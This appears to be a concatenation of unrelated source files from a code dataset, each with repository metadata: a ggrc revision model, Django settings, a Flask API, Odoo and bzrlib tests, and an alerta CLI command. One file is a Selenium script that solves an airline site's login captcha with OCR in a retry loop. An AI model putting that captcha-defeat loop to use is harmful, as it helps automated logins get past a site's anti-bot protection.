destination_id = db.Column(db.Integer, nullable=True)
@staticmethod
def _extra_table_args(_):
return (db.Index('revisions_modified_by', 'modified_by_id'),)
_publish_attrs = [
'resource_id',
'resource_type',
'source_type',
'source_id',
'destination_type',
'destination_id',
'action',
'content',
'description',
]
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(Revision, cls).eager_query()
return query.options(
orm.subqueryload('modified_by'),
orm.subqueryload('event'), # used in description
)
def __init__(self, obj, modified_by_id, action, content):
self.resource_id = obj.id
self.modified_by_id = modified_by_id
self.resource_type = str(obj.__class__.__name__)
self.action = action
self.content = content
for attr in ["source_type",
"source_id",
"destination_type",
"destination_id"]:
setattr(self, attr, getattr(obj, attr, None))
def _description_mapping(self, link_objects):
"""Compute description for revisions with <-> in display name."""
display_name = self.content['display_name']
source, destination = display_name.split('<->')[:2]
mapping_verb = "linked" if self.resource_type in link_objects else "mapped"
if self.action == 'created':
result = u"{1} {2} to {0}".format(source, destination, mapping_verb)
elif self.action == 'deleted':
result = u"{1} un{2} from {0}".format(source, destination, mapping_verb)
else:
result = u"{0} {1}".format(display_name, self.action)
return result
@computed_property
def description(self):
"""Compute a human readable description from action and content."""
link_objects = ['ObjectDocument']
if 'display_name' not in self.content:
return ''
display_name = self.content['display_name']
if not display_name:
result = u"{0} {1}".format(self.resource_type, self.action)
elif u'<->' in display_name:
result = self._description_mapping(link_objects)
else:
if 'mapped_directive' in self.content:
# then this is a special case of combined map/creation
# should happen only for Section and Control
mapped_directive = self.content['mapped_directive']
if self.action == 'created':
result = u"New {0}, {1}, created and mapped to {2}".format(
self.resource_type,
display_name,
mapped_directive
)
elif self.action == 'deleted':
result = u"{0} unmapped from {1} and deleted".format(
display_name, mapped_directive)
else:
result = u"{0} {1}".format(display_name, self.action)
else:
# otherwise, it's a normal creation event
result = u"{0} {1}".format(display_name, self.action)
if self.event.action == "IMPORT":
result += ", via spreadsheet import"
return result
|
prasannav7/ggrc-core
|
src/ggrc/models/revision.py
|
Python
|
apache-2.0
| 4,093
| 0.008063
|
from .base import *
DEBUG = True
EMAIL_BACKEND = 'nr.sendmailemailbackend.EmailBackend'
|
shafiquejamal/socialassistanceregistry
|
nr/nr/settings/testinserver.py
|
Python
|
bsd-3-clause
| 88
| 0.011364
|
# coding: utf-8
from google.appengine.ext import ndb
from flask.ext import restful
import flask
from api import helpers
import auth
import model
import util
from main import api_v1
###############################################################################
# Admin
###############################################################################
@api_v1.resource('/admin/song/', endpoint='api.admin.song.list')
class AdminSongListAPI(restful.Resource):
@auth.admin_required
def get(self):
song_keys = util.param('song_keys', list)
if song_keys:
song_db_keys = [ndb.Key(urlsafe=k) for k in song_keys]
song_dbs = ndb.get_multi(song_db_keys)
      return helpers.make_response(song_dbs, model.Song.FIELDS)
song_dbs, song_cursor = model.Song.get_dbs()
return helpers.make_response(song_dbs, model.Song.FIELDS, song_cursor)
@api_v1.resource('/admin/song/<string:song_key>/', endpoint='api.admin.song')
class AdminSongAPI(restful.Resource):
@auth.admin_required
def get(self, song_key):
song_db = ndb.Key(urlsafe=song_key).get()
if not song_db:
helpers.make_not_found_exception('song %s not found' % song_key)
return helpers.make_response(song_db, model.Song.FIELDS)
|
lipis/the-smallest-creature
|
main/api/v1/song.py
|
Python
|
mit
| 1,226
| 0.006525
|
# -*- coding: utf-8 -*-
# Copyright 2017 LasLabs Inc.
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import os
import mock
from odoo.modules import get_module_path
from odoo.tests.common import TransactionCase
from odoo.tools import mute_logger
from odoo.addons.module_auto_update.addon_hash import addon_hash
from ..models.module_deprecated import PARAM_DEPRECATED
model = 'odoo.addons.module_auto_update.models.module'
class EndTestException(Exception):
pass
class TestModule(TransactionCase):
def setUp(self):
super(TestModule, self).setUp()
module_name = 'module_auto_update'
self.env["ir.config_parameter"].set_param(PARAM_DEPRECATED, "1")
self.own_module = self.env['ir.module.module'].search([
('name', '=', module_name),
])
self.own_dir_path = get_module_path(module_name)
keep_langs = self.env['res.lang'].search([]).mapped('code')
self.own_checksum = addon_hash(
self.own_dir_path,
exclude_patterns=['*.pyc', '*.pyo', '*.pot', 'static/*'],
keep_langs=keep_langs,
)
self.own_writeable = os.access(self.own_dir_path, os.W_OK)
@mock.patch('%s.get_module_path' % model)
def create_test_module(self, vals, get_module_path_mock):
get_module_path_mock.return_value = self.own_dir_path
test_module = self.env['ir.module.module'].create(vals)
return test_module
def test_store_checksum_installed_state_installed(self):
"""It should set the module's checksum_installed equal to
checksum_dir when vals contain a ``latest_version`` str."""
self.own_module.checksum_installed = 'test'
self.own_module._store_checksum_installed({'latest_version': '1.0'})
self.assertEqual(
self.own_module.checksum_installed, self.own_module.checksum_dir,
)
def test_store_checksum_installed_state_uninstalled(self):
"""It should clear the module's checksum_installed when vals
contain ``"latest_version": False``"""
self.own_module.checksum_installed = 'test'
self.own_module._store_checksum_installed({'latest_version': False})
self.assertIs(self.own_module.checksum_installed, False)
def test_store_checksum_installed_vals_contain_checksum_installed(self):
"""It should not set checksum_installed to False or checksum_dir when
a checksum_installed is included in vals"""
self.own_module.checksum_installed = 'test'
self.own_module._store_checksum_installed({
'state': 'installed',
'checksum_installed': 'test',
})
self.assertEqual(
self.own_module.checksum_installed, 'test',
'Providing checksum_installed in vals did not prevent overwrite',
)
def test_store_checksum_installed_with_retain_context(self):
"""It should not set checksum_installed to False or checksum_dir when
self has context retain_checksum_installed=True"""
self.own_module.checksum_installed = 'test'
self.own_module.with_context(
retain_checksum_installed=True,
)._store_checksum_installed({'state': 'installed'})
self.assertEqual(
self.own_module.checksum_installed, 'test',
'Providing retain_checksum_installed context did not prevent '
'overwrite',
)
@mock.patch('%s.get_module_path' % model)
def test_button_uninstall_no_recompute(self, module_path_mock):
"""It should not attempt update on `button_uninstall`."""
module_path_mock.return_value = self.own_dir_path
vals = {
'name': 'module_auto_update_test_module',
'state': 'installed',
}
test_module = self.create_test_module(vals)
test_module.checksum_installed = 'test'
uninstall_module = self.env['ir.module.module'].search([
('name', '=', 'web'),
])
uninstall_module.button_uninstall()
self.assertNotEqual(
test_module.state, 'to upgrade',
'Auto update logic was triggered during uninstall.',
)
def test_button_immediate_uninstall_no_recompute(self):
"""It should not attempt update on `button_immediate_uninstall`."""
uninstall_module = self.env['ir.module.module'].search([
('name', '=', 'web'),
])
try:
mk = mock.MagicMock()
uninstall_module._patch_method('button_uninstall', mk)
mk.side_effect = EndTestException
with self.assertRaises(EndTestException):
uninstall_module.button_immediate_uninstall()
finally:
uninstall_module._revert_method('button_uninstall')
def test_button_uninstall_cancel(self):
"""It should preserve checksum_installed when cancelling uninstall"""
self.own_module.write({'state': 'to remove'})
self.own_module.checksum_installed = 'test'
self.own_module.button_uninstall_cancel()
self.assertEqual(
self.own_module.checksum_installed, 'test',
'Uninstall cancellation does not preserve checksum_installed',
)
def test_button_upgrade_cancel(self):
"""It should preserve checksum_installed when cancelling upgrades"""
self.own_module.write({'state': 'to upgrade'})
self.own_module.checksum_installed = 'test'
self.own_module.button_upgrade_cancel()
self.assertEqual(
self.own_module.checksum_installed, 'test',
'Upgrade cancellation does not preserve checksum_installed',
)
def test_create(self):
"""It should call _store_checksum_installed method"""
_store_checksum_installed_mock = mock.MagicMock()
try:
self.env['ir.module.module']._patch_method(
'_store_checksum_installed',
_store_checksum_installed_mock,
)
vals = {
'name': 'module_auto_update_test_module',
'state': 'installed',
}
self.create_test_module(vals)
_store_checksum_installed_mock.assert_called_once_with(vals)
finally:
self.env['ir.module.module']._revert_method(
'_store_checksum_installed',
)
@mute_logger("openerp.modules.module")
@mock.patch('%s.get_module_path' % model)
def test_get_module_list(self, module_path_mock):
"""It should change the state of modules with different
checksum_dir and checksum_installed to 'to upgrade'"""
module_path_mock.return_value = self.own_dir_path
vals = {
'name': 'module_auto_update_test_module',
'state': 'installed',
}
test_module = self.create_test_module(vals)
test_module.checksum_installed = 'test'
self.env['base.module.upgrade'].get_module_list()
self.assertEqual(
test_module.state, 'to upgrade',
'List update does not mark upgradeable modules "to upgrade"',
)
@mock.patch('%s.get_module_path' % model)
def test_get_module_list_only_changes_installed(self, module_path_mock):
"""It should not change the state of a module with a former state
other than 'installed' to 'to upgrade'"""
module_path_mock.return_value = self.own_dir_path
vals = {
'name': 'module_auto_update_test_module',
'state': 'uninstalled',
}
test_module = self.create_test_module(vals)
self.env['base.module.upgrade'].get_module_list()
self.assertNotEqual(
test_module.state, 'to upgrade',
'List update changed state of an uninstalled module',
)
def test_write(self):
"""It should call _store_checksum_installed method"""
_store_checksum_installed_mock = mock.MagicMock()
self.env['ir.module.module']._patch_method(
'_store_checksum_installed',
_store_checksum_installed_mock,
)
vals = {'state': 'installed'}
self.own_module.write(vals)
_store_checksum_installed_mock.assert_called_once_with(vals)
self.env['ir.module.module']._revert_method(
'_store_checksum_installed',
)
|
ovnicraft/server-tools
|
module_auto_update/tests/test_module_deprecated.py
|
Python
|
agpl-3.0
| 8,365
| 0
|
import json
import click
from tabulate import tabulate
@click.command('notes', short_help='List notes')
@click.option('--alert-id', '-i', metavar='UUID', help='alert IDs (can use short 8-char id)')
@click.pass_obj
def cli(obj, alert_id):
"""List notes."""
client = obj['client']
if alert_id:
if obj['output'] == 'json':
r = client.http.get('/alert/{}/notes'.format(alert_id))
click.echo(json.dumps(r['notes'], sort_keys=True, indent=4, ensure_ascii=False))
else:
timezone = obj['timezone']
headers = {
'id': 'NOTE ID', 'text': 'NOTE', 'user': 'USER', 'type': 'TYPE', 'attributes': 'ATTRIBUTES',
'createTime': 'CREATED', 'updateTime': 'UPDATED', 'related': 'RELATED ID', 'customer': 'CUSTOMER'
}
click.echo(tabulate([n.tabular(timezone) for n in client.get_alert_notes(alert_id)], headers=headers, tablefmt=obj['output']))
else:
raise click.UsageError('Need "--alert-id" to list notes.')
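# Example invocations (hypothetical alert id; assumes this command is wired
# into the `alerta` CLI entry point and that `--output` is a global option):
#   alerta notes --alert-id 1a2b3c4d
#   alerta --output json notes -i 1a2b3c4d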
|
alerta/python-alerta
|
alertaclient/commands/cmd_notes.py
|
Python
|
mit
| 1,034
| 0.004836
|
# -*- coding: utf-8 -*-
# Recognize a login captcha with Python + Selenium
#
import re
import requests
import pytesseract
from selenium import webdriver
from PIL import Image, ImageEnhance
import time
#
driver = webdriver.Chrome()
driver.maximize_window()
driver.get("https://higo.flycua.com/hp/html/login.html")
driver.implicitly_wait(30)
# The username and password below are personal information, so they are hidden
driver.find_element_by_name('memberId').send_keys('xxxxxx')
driver.find_element_by_name('password').send_keys('xxxxxx')
# The captcha is rarely recognized correctly on the first try, so loop and
# keep recognizing until login succeeds
while True:
    # Clear the captcha input box; it may still hold a previously
    # misrecognized captcha
    driver.find_element_by_name("verificationCode").clear()
    # Path where the screenshot / captcha image is saved
    screenImg = r"H:\screenImg.png"
    # Take a screenshot of the browser page
    driver.get_screenshot_as_file(screenImg)
    # Locate the position and size of the captcha
    location = driver.find_element_by_name('authImage').location
    size = driver.find_element_by_name('authImage').size
    # The four lines below add manual offsets; in theory they are unneeded,
    # but without them the crop misses the captcha area -- check the saved
    # screenshot and adjust the offsets to match
    left = location['x'] + 530
    top = location['y'] + 175
    right = location['x'] + size['width'] + 553
    bottom = location['y'] + size['height'] + 200
    # Read the screenshot from file, crop out the captcha area and save again
    img = Image.open(screenImg).crop((left, top, right, bottom))
    # Some image processing below to make recognition more reliable
    img = img.convert('RGBA')  # conversion mode: L | RGB
    img = img.convert('L')  # conversion mode: L | RGB
    img = ImageEnhance.Contrast(img)  # build a contrast enhancer
    img = img.enhance(2.0)  # apply 2x contrast enhancement
    img.save(screenImg)
    # Read the image back and recognize the captcha
    img = Image.open(screenImg)
    code = pytesseract.image_to_string(img)
    # Print the recognized captcha
    # print(code.strip())
    # Strip special characters from the recognized captcha with a regular
    # expression, keeping only letters and digits
    b = ''
    for i in code.strip():
        pattern = re.compile(r'[a-zA-Z0-9]')
        m = pattern.search(i)
        if m is not None:
            b += i
    # Output the captcha with special characters removed
    print(b)
    # Type the cleaned-up captcha into the input box
    driver.find_element_by_name("verificationCode").send_keys(b)
    # Click the login button
    driver.find_element_by_class_name('login-form-btn-submit').click()
    # Wait 5 seconds: after a wrong captcha, the error prompt blocks further
    # interaction for a moment
    time.sleep(5)
    # Get the cookies and convert them to a string
    cookie1 = str(driver.get_cookies())
    print(cookie1)
    # Check whether the cookie string contains 'tokenId'; if so, login
    # succeeded and we can stop, otherwise recognize the captcha again
    matchObj = re.search(r'tokenId', cookie1, re.M | re.I)
    if matchObj:
        print(matchObj.group())
        break
    else:
        print("No match!!")
print('Done')
|
1065865483/0python_script
|
test/imag_test.py
|
Python
|
mit
| 3,355
| 0.001257
|
# Copyright (C) 2006-2011 Canonical Ltd
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""Tests for the BzrDir facility and any format specific tests.
For interface contract tests, see tests/per_bzr_dir.
"""
import os
import subprocess
import sys
from bzrlib import (
branch,
bzrdir,
config,
controldir,
errors,
help_topics,
lock,
repository,
revision as _mod_revision,
osutils,
remote,
transport as _mod_transport,
urlutils,
win32utils,
workingtree_3,
workingtree_4,
)
import bzrlib.branch
from bzrlib.branchfmt.fullhistory import BzrBranchFormat5
from bzrlib.errors import (
NotBranchError,
NoColocatedBranchSupport,
UnknownFormatError,
UnsupportedFormatError,
)
from bzrlib.tests import (
TestCase,
TestCaseWithMemoryTransport,
TestCaseWithTransport,
TestSkipped,
)
from bzrlib.tests import (
http_server,
http_utils,
)
from bzrlib.tests.test_http import TestWithTransport_pycurl
from bzrlib.transport import (
memory,
pathfilter,
)
from bzrlib.transport.http._urllib import HttpTransport_urllib
from bzrlib.transport.nosmart import NoSmartTransportDecorator
from bzrlib.transport.readonly import ReadonlyTransportDecorator
from bzrlib.repofmt import knitrepo, knitpack_repo
class TestDefaultFormat(TestCase):
def test_get_set_default_format(self):
old_format = bzrdir.BzrDirFormat.get_default_format()
# default is BzrDirMetaFormat1
self.assertIsInstance(old_format, bzrdir.BzrDirMetaFormat1)
controldir.ControlDirFormat._set_default_format(SampleBzrDirFormat())
# creating a bzr dir should now create an instrumented dir.
try:
result = bzrdir.BzrDir.create('memory:///')
self.assertIsInstance(result, SampleBzrDir)
finally:
controldir.ControlDirFormat._set_default_format(old_format)
self.assertEqual(old_format, bzrdir.BzrDirFormat.get_default_format())
class DeprecatedBzrDirFormat(bzrdir.BzrDirFormat):
"""A deprecated bzr dir format."""
class TestFormatRegistry(TestCase):
def make_format_registry(self):
my_format_registry = controldir.ControlDirFormatRegistry()
my_format_registry.register('deprecated', DeprecatedBzrDirFormat,
'Some format. Slower and unawesome and deprecated.',
deprecated=True)
my_format_registry.register_lazy('lazy', 'bzrlib.tests.test_bzrdir',
'DeprecatedBzrDirFormat', 'Format registered lazily',
deprecated=True)
bzrdir.register_metadir(my_format_registry, 'knit',
'bzrlib.repofmt.knitrepo.RepositoryFormatKnit1',
'Format using knits',
)
my_format_registry.set_default('knit')
bzrdir.register_metadir(my_format_registry,
'branch6',
'bzrlib.repofmt.knitrepo.RepositoryFormatKnit3',
'Experimental successor to knit. Use at your own risk.',
branch_format='bzrlib.branch.BzrBranchFormat6',
experimental=True)
bzrdir.register_metadir(my_format_registry,
'hidden format',
'bzrlib.repofmt.knitrepo.RepositoryFormatKnit3',
'Experimental successor to knit. Use at your own risk.',
branch_format='bzrlib.branch.BzrBranchFormat6', hidden=True)
my_format_registry.register('hiddendeprecated', DeprecatedBzrDirFormat,
'Old format. Slower and does not support things. ', hidden=True)
my_format_registry.register_lazy('hiddenlazy', 'bzrlib.tests.test_bzrdir',
'DeprecatedBzrDirFormat', 'Format registered lazily',
deprecated=True, hidden=True)
return my_format_registry
def test_format_registry(self):
my_format_registry = self.make_format_registry()
my_bzrdir = my_format_registry.make_bzrdir('lazy')
self.assertIsInstance(my_bzrdir, DeprecatedBzrDirFormat)
my_bzrdir = my_format_registry.make_bzrdir('deprecated')
self.assertIsInstance(my_bzrdir, DeprecatedBzrDirFormat)
my_bzrdir = my_format_registry.make_bzrdir('default')
self.assertIsInstance(my_bzrdir.repository_format,
knitrepo.RepositoryFormatKnit1)
my_bzrdir = my_format_registry.make_bzrdir('knit')
self.assertIsInstance(my_bzrdir.repository_format,
knitrepo.RepositoryFormatKnit1)
my_bzrdir = my_format_registry.make_bzrdir('branch6')
self.assertIsInstance(my_bzrdir.get_branch_format(),
bzrlib.branch.BzrBranchFormat6)
def test_get_help(self):
my_format_registry = self.make_format_registry()
self.assertEqual('Format registered lazily',
my_format_registry.get_help('lazy'))
self.assertEqual('Format using knits',
my_format_registry.get_help('knit'))
self.assertEqual('Format using knits',
my_format_registry.get_help('default'))
self.assertEqual('Some format. Slower and unawesome and deprecated.',
my_format_registry.get_help('deprecated'))
def test_help_topic(self):
topics = help_topics.HelpTopicRegistry()
registry = self.make_format_registry()
topics.register('current-formats', registry.help_topic,
'Current formats')
topics.register('other-formats', registry.help_topic,
'Other formats')
new = topics.get_detail('current-formats')
rest = topics.get_detail('other-formats')
experimental, deprecated = rest.split('Deprecated formats')
self.assertContainsRe(new, 'formats-help')
self.assertContainsRe(new,
':knit:\n \(native\) \(default\) Format using knits\n')
self.assertContainsRe(experimental,
':branch6:\n \(native\) Experimental successor to knit')
self.assertContainsRe(deprecated,
':lazy:\n \(native\) Format registered lazily\n')
self.assertNotContainsRe(new, 'hidden')
def test_set_default_repository(self):
default_factory = controldir.format_registry.get('default')
old_default = [k for k, v in controldir.format_registry.iteritems()
if v == default_factory and k != 'default'][0]
controldir.format_registry.set_default_repository('dirstate-with-subtree')
try:
self.assertIs(controldir.format_registry.get('dirstate-with-subtree'),
controldir.format_registry.get('default'))
self.assertIs(
repository.format_registry.get_default().__class__,
knitrepo.RepositoryFormatKnit3)
finally:
controldir.format_registry.set_default_repository(old_default)
def test_aliases(self):
a_registry = controldir.ControlDirFormatRegistry()
a_registry.register('deprecated', DeprecatedBzrDirFormat,
'Old format. Slower and does not support stuff',
deprecated=True)
a_registry.register('deprecatedalias', DeprecatedBzrDirFormat,
'Old format. Slower and does not support stuff',
deprecated=True, alias=True)
self.assertEqual(frozenset(['deprecatedalias']), a_registry.aliases())
class SampleBranch(bzrlib.branch.Branch):
"""A dummy branch for guess what, dummy use."""
def __init__(self, dir):
self.bzrdir = dir
class SampleRepository(bzrlib.repository.Repository):
"""A dummy repo."""
def __init__(self, dir):
self.bzrdir = dir
class SampleBzrDir(bzrdir.BzrDir):
"""A sample BzrDir implementation to allow testing static methods."""
def create_repository(self, shared=False):
"""See ControlDir.create_repository."""
return "A repository"
def open_repository(self):
"""See ControlDir.open_repository."""
return SampleRepository(self)
def create_branch(self, name=None):
"""See ControlDir.create_branch."""
if name is not None:
raise NoColocatedBranchSupport(self)
return SampleBranch(self)
def create_workingtree(self):
"""See ControlDir.create_workingtree."""
return "A tree"
class SampleBzrDirFormat(bzrdir.BzrDirFormat):
"""A sample format
this format is initializable, unsupported to aid in testing the
open and open_downlevel routines.
"""
def get_format_string(self):
"""See BzrDirFormat.get_format_string()."""
return "Sample .bzr dir format."
def initialize_on_transport(self, t):
"""Create a bzr dir."""
t.mkdir('.bzr')
t.put_bytes('.bzr/branch-format', self.get_format_string())
return SampleBzrDir(t, self)
def is_supported(self):
return False
def open(self, transport, _found=None):
return "opened branch."
@classmethod
def from_string(cls, format_string):
return cls()
class BzrDirFormatTest1(bzrdir.BzrDirMetaFormat1):
@staticmethod
def get_format_string():
return "Test format 1"
class BzrDirFormatTest2(bzrdir.BzrDirMetaFormat1):
@staticmethod
def get_format_string():
return "Test format 2"
class TestBzrDirFormat(TestCaseWithTransport):
"""Tests for the BzrDirFormat facility."""
def test_find_format(self):
# is the right format object found for a branch?
# create a branch with a few known format objects.
bzrdir.BzrProber.formats.register(BzrDirFormatTest1.get_format_string(),
BzrDirFormatTest1())
self.addCleanup(bzrdir.BzrProber.formats.remove,
BzrDirFormatTest1.get_format_string())
bzrdir.BzrProber.formats.register(BzrDirFormatTest2.get_format_string(),
BzrDirFormatTest2())
self.addCleanup(bzrdir.BzrProber.formats.remove,
BzrDirFormatTest2.get_format_string())
t = self.get_transport()
self.build_tree(["foo/", "bar/"], transport=t)
def check_format(format, url):
format.initialize(url)
t = _mod_transport.get_transport_from_path(url)
found_format = bzrdir.BzrDirFormat.find_format(t)
self.assertIsInstance(found_format, format.__class__)
check_format(BzrDirFormatTest1(), "foo")
check_format(BzrDirFormatTest2(), "bar")
def test_find_format_nothing_there(self):
self.assertRaises(NotBranchError,
bzrdir.BzrDirFormat.find_format,
_mod_transport.get_transport_from_path('.'))
def test_find_format_unknown_format(self):
t = self.get_transport()
t.mkdir('.bzr')
t.put_bytes('.bzr/branch-format', '')
self.assertRaises(UnknownFormatError,
bzrdir.BzrDirFormat.find_format,
_mod_transport.get_transport_from_path('.'))
def test_register_unregister_format(self):
format = SampleBzrDirFormat()
url = self.get_url()
# make a bzrdir
format.initialize(url)
# register a format for it.
bzrdir.BzrProber.formats.register(format.get_format_string(), format)
# which bzrdir.Open will refuse (not supported)
self.assertRaises(UnsupportedFormatError, bzrdir.BzrDir.open, url)
# which bzrdir.open_containing will refuse (not supported)
self.assertRaises(UnsupportedFormatError, bzrdir.BzrDir.open_containing, url)
# but open_downlevel will work
t = _mod_transport.get_transport_from_url(url)
self.assertEqual(format.open(t), bzrdir.BzrDir.open_unsupported(url))
# unregister the format
bzrdir.BzrProber.formats.remove(format.get_format_string())
# now open_downlevel should fail too.
self.assertRaises(UnknownFormatError, bzrdir.BzrDir.open_unsupported, url)
def test_create_branch_and_repo_uses_default(self):
format = SampleBzrDirFormat()
branch = bzrdir.BzrDir.create_branch_and_repo(self.get_url(),
format=format)
self.assertTrue(isinstance(branch, SampleBranch))
def test_create_branch_and_repo_under_shared(self):
# creating a branch and repo in a shared repo uses the
# shared repository
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
branch = bzrdir.BzrDir.create_branch_and_repo(
self.get_url('child'), format=format)
self.assertRaises(errors.NoRepositoryPresent,
branch.bzrdir.open_repository)
def test_create_branch_and_repo_under_shared_force_new(self):
# creating a branch and repo in a shared repo can be forced to
# make a new repo
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
branch = bzrdir.BzrDir.create_branch_and_repo(self.get_url('child'),
force_new_repo=True,
format=format)
branch.bzrdir.open_repository()
def test_create_standalone_working_tree(self):
format = SampleBzrDirFormat()
# note this is deliberately readonly, as this failure should
# occur before any writes.
self.assertRaises(errors.NotLocalUrl,
bzrdir.BzrDir.create_standalone_workingtree,
self.get_readonly_url(), format=format)
tree = bzrdir.BzrDir.create_standalone_workingtree('.',
format=format)
self.assertEqual('A tree', tree)
def test_create_standalone_working_tree_under_shared_repo(self):
# create standalone working tree always makes a repo.
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
# note this is deliberately readonly, as this failure should
# occur before any writes.
self.assertRaises(errors.NotLocalUrl,
bzrdir.BzrDir.create_standalone_workingtree,
self.get_readonly_url('child'), format=format)
tree = bzrdir.BzrDir.create_standalone_workingtree('child',
format=format)
tree.bzrdir.open_repository()
def test_create_branch_convenience(self):
# outside a repo the default convenience output is a repo+branch_tree
format = controldir.format_registry.make_bzrdir('knit')
branch = bzrdir.BzrDir.create_branch_convenience('.', format=format)
branch.bzrdir.open_workingtree()
branch.bzrdir.open_repository()
def test_create_branch_convenience_possible_transports(self):
"""Check that the optional 'possible_transports' is recognized"""
format = controldir.format_registry.make_bzrdir('knit')
t = self.get_transport()
branch = bzrdir.BzrDir.create_branch_convenience(
'.', format=format, possible_transports=[t])
branch.bzrdir.open_workingtree()
branch.bzrdir.open_repository()
def test_create_branch_convenience_root(self):
"""Creating a branch at the root of a fs should work."""
self.vfs_transport_factory = memory.MemoryServer
# outside a repo the default convenience output is a repo+branch_tree
format = controldir.format_registry.make_bzrdir('knit')
branch = bzrdir.BzrDir.create_branch_convenience(self.get_url(),
format=format)
self.assertRaises(errors.NoWorkingTree,
branch.bzrdir.open_workingtree)
branch.bzrdir.open_repository()
def test_create_branch_convenience_under_shared_repo(self):
        # inside a repo the default convenience output is a branch; whether a
        # tree is created follows the repo tree policy
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
branch = bzrdir.BzrDir.create_branch_convenience('child',
format=format)
branch.bzrdir.open_workingtree()
self.assertRaises(errors.NoRepositoryPresent,
branch.bzrdir.open_repository)
def test_create_branch_convenience_under_shared_repo_force_no_tree(self):
        # inside a repo the default convenience output is a branch; whether a
        # tree is created follows the repo tree policy, but we can override that
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
branch = bzrdir.BzrDir.create_branch_convenience('child',
force_new_tree=False, format=format)
self.assertRaises(errors.NoWorkingTree,
branch.bzrdir.open_workingtree)
self.assertRaises(errors.NoRepositoryPresent,
branch.bzrdir.open_repository)
def test_create_branch_convenience_under_shared_repo_no_tree_policy(self):
        # inside a repo the default convenience output is a branch; whether a
        # tree is created follows the repo tree policy
format = controldir.format_registry.make_bzrdir('knit')
repo = self.make_repository('.', shared=True, format=format)
repo.set_make_working_trees(False)
branch = bzrdir.BzrDir.create_branch_convenience('child',
format=format)
self.assertRaises(errors.NoWorkingTree,
branch.bzrdir.open_workingtree)
self.assertRaises(errors.NoRepositoryPresent,
branch.bzrdir.open_repository)
def test_create_branch_convenience_under_shared_repo_no_tree_policy_force_tree(self):
        # inside a repo the default convenience output is a branch; whether a
        # tree is created follows the repo tree policy, but we can override that
format = controldir.format_registry.make_bzrdir('knit')
repo = self.make_repository('.', shared=True, format=format)
repo.set_make_working_trees(False)
branch = bzrdir.BzrDir.create_branch_convenience('child',
force_new_tree=True, format=format)
branch.bzrdir.open_workingtree()
self.assertRaises(errors.NoRepositoryPresent,
branch.bzrdir.open_repository)
def test_create_branch_convenience_under_shared_repo_force_new_repo(self):
# inside a repo the default convenience output is overridable to give
# repo+branch+tree
format = controldir.format_registry.make_bzrdir('knit')
self.make_repository('.', shared=True, format=format)
branch = bzrdir.BzrDir.create_branch_convenience('child',
force_new_repo=True, format=format)
branch.bzrdir.open_repository()
branch.bzrdir.open_workingtree()
class TestRepositoryAcquisitionPolicy(TestCaseWithTransport):
def test_acquire_repository_standalone(self):
"""The default acquisition policy should create a standalone branch."""
my_bzrdir = self.make_bzrdir('.')
repo_policy = my_bzrdir.determine_repository_policy()
repo, is_new = repo_policy.acquire_repository()
self.assertEqual(repo.bzrdir.root_transport.base,
my_bzrdir.root_transport.base)
self.assertFalse(repo.is_shared())
def test_determine_stacking_policy(self):
parent_bzrdir = self.make_bzrdir('.')
child_bzrdir = self.make_bzrdir('child')
parent_bzrdir.get_config().set_default_stack_on('http://example.org')
repo_policy = child_bzrdir.determine_repository_policy()
self.assertEqual('http://example.org', repo_policy._stack_on)
def test_determine_stacking_policy_relative(self):
parent_bzrdir = self.make_bzrdir('.')
child_bzrdir = self.make_bzrdir('child')
parent_bzrdir.get_config().set_default_stack_on('child2')
repo_policy = child_bzrdir.determine_repository_policy()
self.assertEqual('child2', repo_policy._stack_on)
self.assertEqual(parent_bzrdir.root_transport.base,
repo_policy._stack_on_pwd)
def prepare_default_stacking(self, child_format='1.6'):
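        # create a branch to stack on, point the parent directory's default
        # stacking policy at it, and hand back a transport for the location
        # where the stacked copy will be created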
parent_bzrdir = self.make_bzrdir('.')
child_branch = self.make_branch('child', format=child_format)
parent_bzrdir.get_config().set_default_stack_on(child_branch.base)
new_child_transport = parent_bzrdir.transport.clone('child2')
return child_branch, new_child_transport
def test_clone_on_transport_obeys_stacking_policy(self):
child_branch, new_child_transport = self.prepare_default_stacking()
new_child = child_branch.bzrdir.clone_on_transport(new_child_transport)
self.assertEqual(child_branch.base,
new_child.open_branch().get_stacked_on_url())
def test_default_stacking_with_stackable_branch_unstackable_repo(self):
# Make stackable source branch with an unstackable repo format.
source_bzrdir = self.make_bzrdir('source')
knitpack_repo.RepositoryFormatKnitPack1().initialize(source_bzrdir)
source_branch = bzrlib.branch.BzrBranchFormat7().initialize(
source_bzrdir)
# Make a directory with a default stacking policy
parent_bzrdir = self.make_bzrdir('parent')
stacked_on = self.make_branch('parent/stacked-on', format='pack-0.92')
parent_bzrdir.get_config().set_default_stack_on(stacked_on.base)
# Clone source into directory
target = source_bzrdir.clone(self.get_url('parent/target'))
def test_format_initialize_on_transport_ex_stacked_on(self):
        # trunk is a stackable format. Note that it's in the same server area
# which is what launchpad does, but not sufficient to exercise the
# general case.
trunk = self.make_branch('trunk', format='1.9')
t = self.get_transport('stacked')
old_fmt = controldir.format_registry.make_bzrdir('pack-0.92')
repo_name = old_fmt.repository_format.network_name()
# Should end up with a 1.9 format (stackable)
repo, control, require_stacking, repo_policy = \
old_fmt.initialize_on_transport_ex(t,
repo_format_name=repo_name, stacked_on='../trunk',
stack_on_pwd=t.base)
if repo is not None:
# Repositories are open write-locked
self.assertTrue(repo.is_write_locked())
self.addCleanup(repo.unlock)
else:
repo = control.open_repository()
self.assertIsInstance(control, bzrdir.BzrDir)
opened = bzrdir.BzrDir.open(t.base)
if not isinstance(old_fmt, remote.RemoteBzrDirFormat):
self.assertEqual(control._format.network_name(),
old_fmt.network_name())
